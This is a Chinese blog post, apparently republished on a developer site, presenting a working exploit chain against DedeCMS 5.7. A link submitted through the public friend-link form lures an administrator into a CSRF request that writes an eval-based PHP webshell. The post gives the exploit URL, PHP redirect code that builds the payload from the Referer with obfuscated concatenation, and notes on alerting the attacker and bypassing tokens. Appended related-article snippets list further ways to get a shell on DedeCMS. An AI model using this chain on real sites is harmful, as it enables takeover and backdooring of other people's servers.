friendlink main.php,灰盒测试之织梦dedecms 5.7 官网最新版 Getshell

最新推荐文章于 2023-05-31 14:19:32 发布
最新推荐文章于 2023-05-31 14:19:32 发布
阅读量430 收藏
点赞数
文章标签: friendlink main.php

很久之前一直用dedecms做二次开发、直接做模版就好了,偶尔要写原生的php代码与dede交互,简单的了解了下里面的model,并未深入,dedecms漏洞那么多、、、能不能也找出一个漏洞呢。 下载了官网最新的程序研究了下。

在前台有个提交友情链接的地方,链接是:/plus/flink_add.php,估计以前可能这里存在xss的吧。反正现在是修复了,不过发现传入的链接,在后台可以直接打开,这样就可以结合csrf进一步利用了。

dede-%E6%BC%8F%E6%B4%9E.png

然后这里网址的,默认有//,也猜到了是提醒这是个http链接,后端没有判断,登陆后台看了下,果然是直接插入进去的:

&lt;sc<x>ript&gt;alert(1)&lt;/scr sc<x>ript> <script>alert(1)</script> 2016-11-04 未审核 50 [更改] [删除]

这样证明了可以做诱导链接了,然后下一步要找csrf可利用的功能,在后台发现一个标签编辑功能里的,dedecms好多地方都是用requests获取的值,不区分get、post,原来是post的,如果post在这肯定构造不成功,get的话,就可以借助csrf一起getshell了。

csrf 诱导 exp链接:./tpl.php?action=savetagfile&actiondo=addnewtag&content=<?php @eval($_POST[‘c’]);?>&filename=hcaker.lib.php  #在当前路径执行这个get请求,写入一句话。

dede-csrf.png

然后就提交了,提交后,后台管理员看到的是这个样子的:

dede-csrf-exp.png

这里就看怎么诱导管理员点击了,一般人看不懂代码,如果点击了,会在 /include/taglib/ 目录下生成一句话 hacker.lib.php,有句话说好奇害死猫,确实是,天上那有掉馅饼的事,别贪便宜,不然容易出事。

就在最后要成功getshell的时候,发生了意外,发现网站名称的href字典限制了长度,把传入的./tpl.php?action=savetagfile&actiondo=addnewtag&content=<?php @eval($_POST[‘c’]);?>&filename=hcaker.lib.php截断为./tpl.php?action=savetagfile&actiondo=addnewtag&content=<?ph ,并没有过滤,看来是限制了字符个数、还是不放弃,产生了另一种好玩的想法,感觉要比这个好玩。

一般后台审核友情链接的人都会看下网站权重,然后决定是否通过审核,这一看就会触发漏洞了。通过分析,需要填一个真实的url,而这个url要获取到referer,然后拼接url重定向,这样就可以实现getshell了,而且还可以在后端做个邮件提醒。方便知道那个站已经getshell了。

然后开始写代码了,这里费了不少时间,主要是一个问题,把代码解析为字符串,用php试过转义、字符串转化等都不成功,最后用序列化函数成功了,但是不完整,程序员的做法应该是序列化和反序列化吧,然后我使用单个字符拼接,解决了问题,其实还可以用ascii码去搞定、原来那些写各种一句话的真不容易,要对语言的任何地方都要了解,不然遇到很多未知的问题。

$exp = ‘tpl.php?action=savetagfile&actiondo=addnewtag&content=’.@eval($_POST[‘c’]).’&filename=hcaker.lib.php’;

//如果您有更好的办法,欢迎提供给我。

然后php做CSRF中转的代码如下:

//print_r($_SERVER);

$referer = $_SERVER['HTTP_REFERER'];

$dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径

//拼接 exp

$muma = '@'.'e'.'v'.'a'.'l'.'('.'$'.'_'.'P'.'O'.'S'.'T'.'['.'\''.'c'.'\''.']'.')';

$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=hacker.lib.php';

$url = $dede_login.$exp;

//echo $url;

header("location: ".$url);

// send mail coder

exit();

然后就重新开始咯,在友情链接里面添加exp友情链接://******.com/exp.php

对方只要访问了,就自动生成 include/taglib/hacker.lib.php噢、上面没有写e-mail通知代码。

getshell-dedecms.png

getshell-dedecms、、、我要提交补天去、、、

之后发现有的cms会限制只允许输入域名,这也没关系,申请个域名,默认就是/index.php,一样可以getshell,还有的为了防止csrf,在请求中加了token令牌验证,这种是有可能被绕过的,绕过几率为80%,下次有机会实现js无刷新获取token令牌getshell。。。

原文出自 //0535code.com/article/20161104_1193.shtml

本文最后更新于2016-11-22,已超过 1 年没有更新,如果文章内容或图片资源失效,请留言反馈,我们会及时处理,谢谢!

独自冷静的时光
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dede ad_js.php getshell,nday漏洞还原分析之dedecms后台getshell
weixin_34151001的博客
03-29 488
前言最近发现 dedecms 的 nday后台getshell ,于是打算还原一下。根据日志显示,攻击者访问了 dede/ad_add.php 文件后,转而访问 plus/ad_js.php 文件,提交的 payload 为 plus/ad_js.php?nocache=1&aid=1&_=whoami 。前期准备我们先来看一下 dede/ad_add.php 文件。可以看到这是一...
DEDECMS5.7后台getshell1
08-03
DEDECMS5.7后台getshell1
dedeCMS后台getshell(三种方法)
weixin_51692662的博客
11-29 1000
dedecms后台sql命令写入一句话
【漏洞复现】DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)
做自己喜欢的事,并将其发挥到极致!
05-31 3506
uploads/dede/article_allowurl_edit.php存在缺少对该文件中写入内容的任何过滤是导致该漏洞的因素之一,在5.7.106之前的DedeCMS中发现了一个漏洞。它已被宣布为关键。受此漏洞影响的是文件uploads/dede/article_allowurl_edit.php的未知功能。操纵参数allurls会导致代码注入。可以远程发起攻击获得网站控制权限。
dedecms V5.7 SP2 web后台getshell
公众号shadow sock7
11-12 5189
https://www.freebuf.com/vuls/164035.html dede/tpl.php任意文件写入漏洞。 条件:已登录后台。 首先访问/dede/tpl.php?action=upload获取token值 访问/dede/tpl.php?filename=&amp;amp;amp;amp;amp;lt;yourname&amp;amp;amp;amp;amp;gt;.lib.php&amp;amp;amp;amp;amp;amp;action=savetagf
JBLOG v1.5 正式版.rar
07-07
20、模板文件link.php改为使用get_friendlink()函数调用友情链接。 21、模板文件tag.php改为使用get_tags()函数调用所有标签,删除原有函数。 22、取消模板文件closed.php,改为系统内置。 23、模板文件404....
css样式表ID命名规则Word版.pdf
11-27
- `friendlink`:友情链接 - `footer`:页脚 - `copyright`:版权 - `wrap`:外套 - `mainnav`:主导航 - `subnav`:子导航 - `container`:容器 - `shop`:功能区(如购物车、收银台) - `current`:当前选中 这些...
网页设计常用的英文单词.pdf
07-14
网页设计是创建和维护网站的关键环节,涉及到许多专业术语和技术概念。以下是一些网页设计中常用的英文单词及其详细解释: 1. **About Us** - 公司简介或关于我们,通常包含公司的历史、使命和愿景。 2. **Author**...
ShopEx 网上商店系统 v4.7服务器安装版
03-24
1、首先请进入以下网址http://www.helicontech.com/download/,下载免费版的ISAPI_Rewrite组件:[ISAPI_RewriteLite(freeware)],这个是免费的,完全版的需要付费。 如果您打不开上面网址,可以下载此贴所带的附件,...
最土数据结构表单说明(最新)最土CMS数据结构说明.pdf
11-19
8. **数据库友情链接表**(friendlink):包含友情连接ID(id)、标题(title)、链接地址(url)、logo、排序(sort_order)和是否显示在首页(display),用于维护网站的外部链接。 9. **数据库邀请返利表**...
CVE-2018-9175 DEDECMS后台getshell
weixin_43263451的博客
03-19 1641
基础 dedecms对于输入是首先全局进行过滤的,在/common.inc.php中注册(赋值变量)并过滤外部提交的参数,下图可以看到对输入参数进行addslashes 漏洞分析 首先在 dede\sys_verifies.php的152行 159-160行创建配置文件modifytmp.inc 161-162行给其中写入一些php的头和内容 166行中refiles参数是我们可控的,看起来默认是数组格式,对于refiles里面每一个值从168-180行进行一些操作,注意最重要的是180行,前面都无所谓
渗透测试-getshell方法总结
Jian Sun_的博客
02-11 3164
一、管理员权限拿shell 需要有管理员权限才可以拿shell 通常需要登录后台执行相关操作 直接上传拿shell 国内多对上传类型进行了限制,需要在进行绕过操作 1、织梦cms后台为例子 进入后台 写入一个一句话木马 长传一个一句话木马 2、数据库备份拿shell 示例:南方数据 v7.0 良精通用企业网站管理系统 方法一: 1.先上一张图马,得到路径 2.选择数据库备份,将图马备份为a.asp 3.访问xxx/xxx/.../a.asp.
php写入织梦,dedeCMS远程写入getshell(测试版本V5.7
weixin_39645041的博客
03-12 211
该漏洞必须结合apache的解析漏洞:当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个Apache认识的扩展名。如果所有的扩展名Apache都不认识,那么变会按照httpd.conf配置中所指定的方式展示这个问题,一般默认情况下是“text/plain”这种方式。dede在安装完成,如果没有删除install文件夹,在install下会有一个index....
120.网络安全渗透测试—[CMS后台 getwebshell]—[织梦dedecms5.7后台 getwebshell]
qwsn
07-10 2790
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! (1)进入后台:模块–>文件管理器---->上传文件---->shell.php,内容为 (2)访问:\shell.php(1)进入后台:模块–>文件管理器–>新建文件–>写入wshell.php,内容为 (2)访问:\wshell.php (3)访问:\shell0.php (1)进入后台:系统–>系统基本参数–>核心配置–>专题最大的节点数或FTP端口写入 (2)访问:data\config.cache.inc.php....
DeDeCMS(织梦)变量覆盖0day getshell
weixin_33895016的博客
03-21 170
测试方法: @Sebug.net   dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! #!usr/bin/php -w &lt;?php error_reporting(E_ERROR); set_time_limit(0); print_r(' DEDEcms Variable Coverage Exploit Author: [url]www.he...
Dedecms 5.7 SP2后台getshell
一个安全研究员
07-02 9820
前言 最近也打算研究研究各大cms的漏洞了,正好看到一篇关于dedecms后台getshell的文章,所以也自己动手复现一下,这样以后遇到了也更容易上手。该漏洞涉及的版本是dedecms最新版吧,下载地址: http://www.dedecms.com/products/dedecms/downloads/ 复现 版本: 我这里测试的是utf8版,这个版本应该不影响。 漏洞位...
plus flink add.php,织梦DedeCMS默认友情链接的安全隐患以及处理(图解)
weixin_28907839的博客
04-08 465
接触过dedecms的站长都知道,友情链接路径是plus/flink.php 以及申请链接路径地址:plus/flink_add.php,相信很多站长没有注意到,这些看似正常的链接路径,却存在一个极其问题,那就是模版路径被知晓。废话就说到这里,接下来开始我们的话题。请看下边图文内容。本地测试揭晓存在的问题。请看图1,我们点击所有链接,然后请看下图二:图二:图二中地址栏的地址即是点击所有链接的相对应...
各种cms getshell技巧
qq_53742230的博客
07-08 2652
常用CMS getshell技巧
plus flink_add.php,Flink支持用户自定义资源
weixin_35479284的博客
03-21 187
一、构建JobGraphJobGraph jobGraph = PackagedProgramUtils.createJobGraph(program, flinkConfiguration, parallelism, false);在这个入口中,构建programPackagedProgram program = PackagedProgram.newBuilder().setJarFile(r...
@GetMapping({"","/","/index","/login"}) public String loginPage(HttpSession session, Model model) { if (null != session && session.getAttribute("user") != null){ int viewCount = 0; int avgView = 0; List<Blog> allBlog = this.blogDao.getAllBlog(); if (allBlog.size() != 0) { for(Blog blog: allBlog) { if (blog.getViews() != null) viewCount += blog.getViews(); } avgView = viewCount / allBlog.size(); } model.addAttribute("article_nums", blogDao.getCount()); model.addAttribute("article_views", viewCount); model.addAttribute("avg_views", avgView); model.addAttribute("friendLink_nums", friendLinkDao.getCount()); model.addAttribute("message_nums", messageDao.getCount()); model.addAttribute("tag_nums", tagDao.getCount()); model.addAttribute("type_nums", typeDao.getCount()); model.addAttribute("user_nums", userDao.getCount()); return "admin/index"; } return "admin/login"; }
最新发布
06-12
这是一个Java Spring Boot框架中的控制器类的方法,使用@GetMapping注解标注该方法可以处理HTTP GET请求,该方法的路径包括"","/","/index"和"/login"。该方法的功能是:如果用户已经登录,将会获取博客的总浏览量、平均浏览量、文章数量、友情链接数量、留言数量、标签数量、分类数量以及用户数量,并将这些数量添加到Model对象中,最后返回管理后台的首页视图"admin/index";否则,返回登录页面视图"admin/login"。该方法还使用了Spring框架的依赖注入,通过@Autowired注解自动注入BlogDao、FriendLinkDao、MessageDao、TagDao、TypeDao和UserDao等数据访问对象。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值